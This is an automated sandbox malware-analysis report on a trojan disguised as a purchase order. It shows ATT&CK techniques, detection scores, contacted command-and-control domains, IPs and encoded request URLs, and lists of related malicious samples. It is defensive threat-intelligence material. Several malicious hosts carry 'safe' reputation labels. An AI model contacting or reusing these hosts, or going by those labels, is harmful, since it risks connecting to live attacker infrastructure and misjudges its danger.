Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Disable or Modify Tools1	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion31	Security Account Manager	Virtualization/Sandbox Evasion31	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection612	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	System Information Discovery112	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information4	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing13	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
PO 367628usa.exe	36%	Virustotal		Browse
PO 367628usa.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
5.2.PO 367628usa.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File
0.2.PO 367628usa.exe.4b0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File

Domains

Source	Detection	Scanner	Label	Link
servantsheartvalet.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.bridgestreetresources.com/meub/?5jYHTPD=wcKMzz9mAcCi2aLb0t1qtV86GlMNvZH+VyhKA1jT/I4bq+nb0/na/dj3wGs+8qrOUrJA87J5aQ==&W2MTZ=5jyDHn6x2rY	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.m-kenterprises.com/meub/?5jYHTPD=AHOwzMgiYatzzgqEm8fFrRw5FyeBXJPWAn72SIj91D3zxHtkj2kvoxgZPNykIH4K/OrW/jgvcw==&W2MTZ=5jyDHn6x2rY	0%	Avira URL Cloud	safe
http://servermanager.miixit.org/index_ru.htmlc	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.servantsheartvalet.com/meub/?5jYHTPD=WGLirrwFUtYpDXzpLjvBuZZEIXcS0L/7kvp4uO4ypDpemvycQ/ZH3e36klWLP588DVSUgz18wg==&W2MTZ=5jyDHn6x2rY	0%	Avira URL Cloud	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://servermanager.miixit.org/index_ru.html	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://servermanager.miixit.org/report/reporter_index.php?name=	0%	Avira URL Cloud	safe
http://servermanager.miixit.org/1	0%	Avira URL Cloud	safe
www.uuoouu-90.store/meub/	0%	Avira URL Cloud	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.patricksparber.com/meub/?5jYHTPD=q/3go0TMrjOOicJ8yyeZoSSUK4YYViZWgar0VOI0LAyS1IHPJrhhqQPM	0%	Avira URL Cloud	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://servermanager.miixit.org/downloads/	0%	Avira URL Cloud	safe
http://servermanager.miixit.org/hits/hit_index.php?k=	0%	Avira URL Cloud	safe
http://www.shadyshainarae.com/meub/?5jYHTPD=IF6wwdQ2GC/v5+zeo737nU5N5nLUvdsVBqkfZ3TmK32/J3TLHA8Ym95CSjw9+1sG86DK55WYOQ==&W2MTZ=5jyDHn6x2rY	0%	Avira URL Cloud	safe
http://www.patricksparber.com/	0%	Avira URL Cloud	safe
http://www.patricksparber.com/K	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
servantsheartvalet.com	209.182.202.96	true	true	0%, Virustotal, Browse	unknown
www.patricksparber.com	156.253.106.229	true	true		unknown
bridgestreetresources.com	66.235.200.147	true	true		unknown
m-kenterprises.com	34.102.136.180	true	false		unknown
shadyshainarae.com	34.102.136.180	true	false		unknown
ext-sq.squarespace.com	198.185.159.144	true	false		high
www.bridgestreetresources.com	unknown	unknown	true		unknown
www.uuoouu-90.store	unknown	unknown	true		unknown
www.shadyshainarae.com	unknown	unknown	true		unknown
www.sherwooddaydesigns.com	unknown	unknown	true		unknown
www.servantsheartvalet.com	unknown	unknown	true		unknown
www.meucamarimoficial.com	unknown	unknown	true		unknown
www.m-kenterprises.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.bridgestreetresources.com/meub/?5jYHTPD=wcKMzz9mAcCi2aLb0t1qtV86GlMNvZH+VyhKA1jT/I4bq+nb0/na/dj3wGs+8qrOUrJA87J5aQ==&W2MTZ=5jyDHn6x2rY	true	Avira URL Cloud: safe	unknown
http://www.m-kenterprises.com/meub/?5jYHTPD=AHOwzMgiYatzzgqEm8fFrRw5FyeBXJPWAn72SIj91D3zxHtkj2kvoxgZPNykIH4K/OrW/jgvcw==&W2MTZ=5jyDHn6x2rY	false	Avira URL Cloud: safe	unknown
http://www.servantsheartvalet.com/meub/?5jYHTPD=WGLirrwFUtYpDXzpLjvBuZZEIXcS0L/7kvp4uO4ypDpemvycQ/ZH3e36klWLP588DVSUgz18wg==&W2MTZ=5jyDHn6x2rY	true	Avira URL Cloud: safe	unknown
www.uuoouu-90.store/meub/	true	Avira URL Cloud: safe	low
http://www.shadyshainarae.com/meub/?5jYHTPD=IF6wwdQ2GC/v5+zeo737nU5N5nLUvdsVBqkfZ3TmK32/J3TLHA8Ym95CSjw9+1sG86DK55WYOQ==&W2MTZ=5jyDHn6x2rY	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000006.00000002.589360759.000000000095C000.00000004.00000020.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	false		high
http://servermanager.miixit.org/index_ru.htmlc	PO 367628usa.exe, 00000000.00000002.345992279.00000000029A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.com	explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css	PO 367628usa.exe, 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmp	false		high
http://www.carterandcone.coml	explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.com	explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn	explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	false		high
http://checkip.dyndns.org/	PO 367628usa.exe, 00000000.00000002.345992279.00000000029A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=CJU3DBQXBUQPC	PO 367628usa.exe, 00000000.00000002.345992279.00000000029A1000.00000004.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/	explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://servermanager.miixit.org/index_ru.html	PO 367628usa.exe, 00000000.00000002.345992279.00000000029A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://servermanager.miixit.org/report/reporter_index.php?name=	PO 367628usa.exe, 00000000.00000002.345992279.00000000029A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers8	explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	false		high
http://servermanager.miixit.org/1	PO 367628usa.exe, 00000000.00000002.345992279.00000000029A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fonts.com	explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.patricksparber.com/meub/?5jYHTPD=q/3go0TMrjOOicJ8yyeZoSSUK4YYViZWgar0VOI0LAyS1IHPJrhhqQPM	raserver.exe, 00000009.00000002.589940302.0000000002F43000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://www.urwpp.deDPlease	explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	PO 367628usa.exe, 00000000.00000002.346748080.0000000002EB0000.00000004.00000001.sdmp	false		high
http://www.sakkal.com	explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=CJU3DBQXBUQPC5http://servermana	PO 367628usa.exe, 00000000.00000002.345992279.00000000029A1000.00000004.00000001.sdmp	false		high
http://servermanager.miixit.org/downloads/	PO 367628usa.exe, 00000000.00000002.345992279.00000000029A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://servermanager.miixit.org/hits/hit_index.php?k=	PO 367628usa.exe, 00000000.00000002.345992279.00000000029A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.patricksparber.com/	raserver.exe, 00000009.00000002.589924154.0000000002F3C000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://www.patricksparber.com/K	raserver.exe, 00000009.00000002.589924154.0000000002F3C000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
156.253.106.229	www.patricksparber.com	Seychelles	136800	XIAOZHIYUN1-AS-APICIDCNETWORKUS	true
34.102.136.180	m-kenterprises.com	United States	15169	GOOGLEUS	false
209.182.202.96	servantsheartvalet.com	United States	22611	IMH-WESTUS	true
66.235.200.147	bridgestreetresources.com	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	412247
Start date:	12.05.2021
Start time:	14:42:17
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	PO 367628usa.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@13/1@9/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 11.3% (good quality ratio 9.6%) Quality average: 67.7% Quality standard deviation: 34.2%
HCA Information:	Successful, ratio: 95% Number of executed functions: 165 Number of non-executed functions: 197
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Excluded IPs from analysis (whitelisted): 104.42.151.234, 52.147.198.201, 104.43.139.144, 20.82.210.154, 40.88.32.150, 92.122.213.194, 92.122.213.247, 52.155.217.156, 2.20.143.16, 2.20.142.209, 20.54.26.129, 184.30.20.56 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report creation exceeded maximum time and may have missing disassembly code information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:43:12	API Interceptor	1x Sleep call for process: PO 367628usa.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
209.182.202.96	PO9448882.exe	Get hash	malicious	Browse	www.servantsheartvalet.com/meub/?8p64Z2=V6A8xrZp&y8y=WGLirrwFUtYpDXzpLjvBuZZEIXcS0L/7kvp4uO4ypDpemvycQ/ZH3e36km6bTIgHEg7F
66.235.200.147	da.exe	Get hash	malicious	Browse	www.burundiacademyst.com/8u3b/?dZ8=BT0h&hDKxoPS=4vEXK17IA394WC8iTvIivdS0Cql5iuvV57KnzC84MNlFoWTpUG2RsyvHd875puybb7chYZMxxA==
	Payment.xlsx	Get hash	malicious	Browse	www.burundiacademyst.com/8u3b/?zh=4vEXK17NAw98WSwuRvIivdS0Cql5iuvV57S3vBg5ItlEon/vTWnd62XFea7/xPqTXNoABg==&BL3=jFNt_dFXS
	Quotation.exe	Get hash	malicious	Browse	www.thesocialgreen.com/mgl/?5j8l=f1uD85eB+cCOn8+C4qvYEhi6iPiStfCl1+N32n42aL6OkNxrdvNbFuLtanM9fSU4CP6/6paE8g==&lnxdA=fTvdzZsH3tODubI
	Payment.xlsx	Get hash	malicious	Browse	www.burundiacademyst.com/8u3b/?AFNHW=7n5t_JdpSvWLy20&hR-pi0=4vEXK17NAw98WSwuRvIivdS0Cql5iuvV57S3vBg5ItlEon/vTWnd62XFea7/xPqTXNoABg==
	MSUtbPjUGib2dvd.exe	Get hash	malicious	Browse	www.thesilverslipper.club/ffy/?2d0=lnxdA&-Z1hnrG=VsEd2ljFwB2w0+9z72Htc0M/tkPafkZssJ8rij5TQB/jOTqdHRQwIgCh7XOuaEky5D7/
	PO20210429.xlsx	Get hash	malicious	Browse	www.burundiacademyst.com/8u3b/?Mz=ltx0qfi0x45&WBZXQ8j=4vEXK17NAw98WSwuRvIivdS0Cql5iuvV57S3vBg5ItlEon/vTWnd62XFea7/xPqTXNoABg==
	INV+PACKING LIST.exe	Get hash	malicious	Browse	www.ponderingelephant.com/ple/?-ZsPdp=xnHXGBz4ypimZ5Y5kb5MaQgvqj3YDL1ZdP3vyaOARIvLjHnyTXBiVpDLKEMSLW5u89hw&alX=TXFxmnkp-thT
	NMpDBwHJP8.exe	Get hash	malicious	Browse	www.bigplatesmallwallet.com/p2io/?Jv4=O674xtRz5BQXEtA9kGCKbVIXJyLg/Uv1kEh0zcEQqY6nJSttJx1/IGytgU6ULEG2tFa9QVoShQ==&NvTHEh=QR-x_26P2h
	2021-03-31.exe	Get hash	malicious	Browse	www.look-production.com/g7b/?mBZ=sMEGTBL7b0Crz/M/9MY8kI3QE8u69YIEpY8MG7KdvZs7JG2S3J70OJI9COEBjTNWNkCc&pPN=OvNDOt
	1LHKlbcoW3.exe	Get hash	malicious	Browse	www.bigplatesmallwallet.com/p2io/?rN=d8VD7828W8N&CR=O674xtRz5BQXEtA9kGCKbVIXJyLg/Uv1kEh0zcEQqY6nJSttJx1/IGytgXWEX1aNqwzs
	loMStbzHSP.exe	Get hash	malicious	Browse	www.bigplatesmallwallet.com/p2io/?sZvD8l=Spap-DKpf&7nEpiRy=O674xtRz5BQXEtA9kGCKbVIXJyLg/Uv1kEh0zcEQqY6nJSttJx1/IGytgU6ULEG2tFa9QVoShQ==
	COAU7229898130.xlsx	Get hash	malicious	Browse	www.ketodietforall.com/jzvu/?tDH=XRR8&8pqhs=iai4crrqmblIbZ8NbTff6TYSVk87qhVrjvjoE2rw9KZdYD2s+/m1/NAmtEChNYkMqGWCvw==
	purchase order#034.exe	Get hash	malicious	Browse	www.open-umbrella.com/8ufh/?EzrthRhp=q59Dr8OAwbpxjg9e4xeHJIK1cZIJWe2R7FFBvmtI2mq90uj2icseWC/7TRWfu69z5jPD&ojo0f=SzrhU8
	Request for Quotation RFQ GC-0016862.PDF.exe	Get hash	malicious	Browse	www.adhumanhealth.com/bhic/?Hp=V6ALib5X&pPX=hCOOqYuHXBu805uhnnycx3T+KYLBHddhxIpVVMBQAbCgJEGGTgUUMO8R3f12KnwfYdKz
	30 percento,pdf.exe	Get hash	malicious	Browse	www.ghorowaseba.com/kio8/?Yn=fJ2hiUQi1hpOeKUG2Couwzy3GD0q5yDtocQqTe9Wxl22Cq32RCF6+kusfpxq26VwKjQqLgOsHQ==&mvKpc=V48DupphUTS4qDu
	E68-STD-239-2020-239.xlsx	Get hash	malicious	Browse	www.asmmacademy.com/qccq/?mTalhtA0=rlaBJ8Mskrxi/2a4/edNV/AmrTlq/nR4UqkkGM1XutPnIWK2blgsIQLwr5szEXSAKovhZw==&WBb8fl=ebFl
	bAcefnEUjb.exe	Get hash	malicious	Browse	www.mateingseason.com/xle/?mdsh-n6=dZP5442chx968NwGkcaPLBUUXkuDw9f5W2ewpXC0yyYgnx4kig0eFnnjyofJrMaHs5iQCvjrWg==&lZN=7neHzjSxG
	KROS Sp. z.o.o.exe	Get hash	malicious	Browse	www.ghorowaseba.com/kio8/?EzrtzJ=apITk4789pRXUl&rZpXZ6=fJ2hiUQi1hpOeKUG2Couwzy3GD0q5yDtocQqTe9Wxl22Cq32RCF6+kusfpxq26VwKjQqLgOsHQ==
	KROS Sp. z.o.o.exe	Get hash	malicious	Browse	www.erniesimms.com/kio8/?9rj0DvY=YN+sslSXNnt/AJtQDW3tg/o15FAEVpNGgRv2M7EAJ2+Csdh8CxFY2PeyXEasYy/TyJiM&v4=Ch6Lm
	Payment Slip00425.exe	Get hash	malicious	Browse	www.erniesimms.com/kio8/?UXrxRry=YN+sslSXNnt/AJtQDW3tg/o15FAEVpNGgRv2M7EAJ2+Csdh8CxFY2PeyXH68XTvrssLL&lf2X=O0DliFfpXhCPLb

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ext-sq.squarespace.com	correct invoice.exe	Get hash	malicious	Browse	198.185.159.144
	SWIFT001411983HNK.exe	Get hash	malicious	Browse	198.185.159.144
	DOC24457188209927.exe	Get hash	malicious	Browse	198.185.159.144
	#U4f9b#U5e94#U6750#U6599.exe	Get hash	malicious	Browse	198.185.159.144
	PP,Sporda.exe	Get hash	malicious	Browse	198.185.159.144
	BORMAR SA_Cotizaci#U00f3n de producto doc.exe	Get hash	malicious	Browse	198.185.159.144
	4LkSpeVqKR.exe	Get hash	malicious	Browse	198.185.159.144
	PO889876.pdf.exe	Get hash	malicious	Browse	198.185.159.144
	202139769574 Shipping Documents.exe	Get hash	malicious	Browse	198.185.159.144
	wMqdemYyHm.exe	Get hash	malicious	Browse	198.49.23.145
	d801e424_by_Libranalysis.docx	Get hash	malicious	Browse	198.185.159.144
	7824,pdf.exe	Get hash	malicious	Browse	198.49.23.145
	PO_29_00412.exe	Get hash	malicious	Browse	198.185.159.144
	DHL_S390201.exe	Get hash	malicious	Browse	198.185.159.145
	triage_dropped_file.exe	Get hash	malicious	Browse	198.185.159.144
	Wire transfer.exe	Get hash	malicious	Browse	198.185.159.144
	mC9LnX9aGE.exe	Get hash	malicious	Browse	198.49.23.145
	4x1cYP0PFs.exe	Get hash	malicious	Browse	198.49.23.145
	SO.xlsm.exe	Get hash	malicious	Browse	198.185.159.144
	RDAx9iDSEL.exe	Get hash	malicious	Browse	198.185.159.144

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
IMH-WESTUS	eLECTRONIC Flight Ticket Invoice confirmationETKT XXXXX3939 INVOICE 000Z1298932 TKT Payment.exe	Get hash	malicious	Browse	192.145.239.54
	eLECTRONIC Flight Ticket Confirmation VIS XXXXX3939 INVOICE 000Z1298932 TKT Payment.exe	Get hash	malicious	Browse	192.145.239.54
	scan of document 5336227.xlsm	Get hash	malicious	Browse	192.249.126.181
	scan of invoice 91510.xlsm	Get hash	malicious	Browse	192.249.126.181
	scan of bill 0905.xlsm	Get hash	malicious	Browse	192.249.126.181
	PO9448882.exe	Get hash	malicious	Browse	209.182.202.96
	check 6746422.xlsm	Get hash	malicious	Browse	192.249.126.181
	TKT eLECTRONIC Flight Ticket Confirmation VIS XXXXX83939 INVOICE 000Z1298932 TKT.exe	Get hash	malicious	Browse	192.145.239.54
	proforma invoice.exe	Get hash	malicious	Browse	192.249.124.39
	SOA.exe	Get hash	malicious	Browse	173.231.198.30
	Invoice Packing List CORP Invoice R-CONM012 2021-04-26 - large shipment tools (1)2021.04.26.exe	Get hash	malicious	Browse	192.145.239.54
	SecuriteInfo.com.Heur.32597.xls	Get hash	malicious	Browse	144.208.70.30
	SecuriteInfo.com.Heur.32597.xls	Get hash	malicious	Browse	144.208.70.30
	SecuriteInfo.com.Heur.31681.xls	Get hash	malicious	Browse	144.208.70.30
	Email - Payment Report.html	Get hash	malicious	Browse	23.235.214.102
	PO472020.xlt	Get hash	malicious	Browse	199.250.214.202
	PO472020.xlt	Get hash	malicious	Browse	199.250.214.202
	PO472020.xlt	Get hash	malicious	Browse	199.250.214.202
	SecuriteInfo.com.Exploit.Siggen3.16583.277.xls	Get hash	malicious	Browse	199.250.214.202
	0BAdCQQVtP.exe	Get hash	malicious	Browse	173.231.192.43
XIAOZHIYUN1-AS-APICIDCNETWORKUS	EDS03932,pdf.exe	Get hash	malicious	Browse	156.241.53.253
	PAYMENT INSTRUCTIONS COPY.exe	Get hash	malicious	Browse	45.207.99.198
	IRMEFUV8EF.exe	Get hash	malicious	Browse	156.241.53.103
	Purchase Order-10764.exe	Get hash	malicious	Browse	154.210.135.241
	987654OIUYFG.exe	Get hash	malicious	Browse	154.207.35.80
	GZocMWoCzL3Rd62.exe	Get hash	malicious	Browse	156.254.252.104
	aea58eb7_by_Libranalysis.xlsx	Get hash	malicious	Browse	156.234.115.176
	DHL Receipt_AWB811470484778.exe	Get hash	malicious	Browse	156.241.53.197
	krcgN6CaG9.exe	Get hash	malicious	Browse	156.253.123.107
	0876543123.exe	Get hash	malicious	Browse	154.207.35.80
	Invoiceo.exe	Get hash	malicious	Browse	154.207.58.218
	x16jmZMFrN.exe	Get hash	malicious	Browse	154.207.58.69
	ppc_unpacked	Get hash	malicious	Browse	156.234.199.243
	NQ1vVJKBcH.exe	Get hash	malicious	Browse	156.253.78.210
	Camscanner.New Order.09878766.exe	Get hash	malicious	Browse	154.222.72.30
	RDAx9iDSEL.exe	Get hash	malicious	Browse	156.241.53.161
	REF # 166060421.doc	Get hash	malicious	Browse	154.207.35.111
	FORM C.xlsx	Get hash	malicious	Browse	156.255.140.216
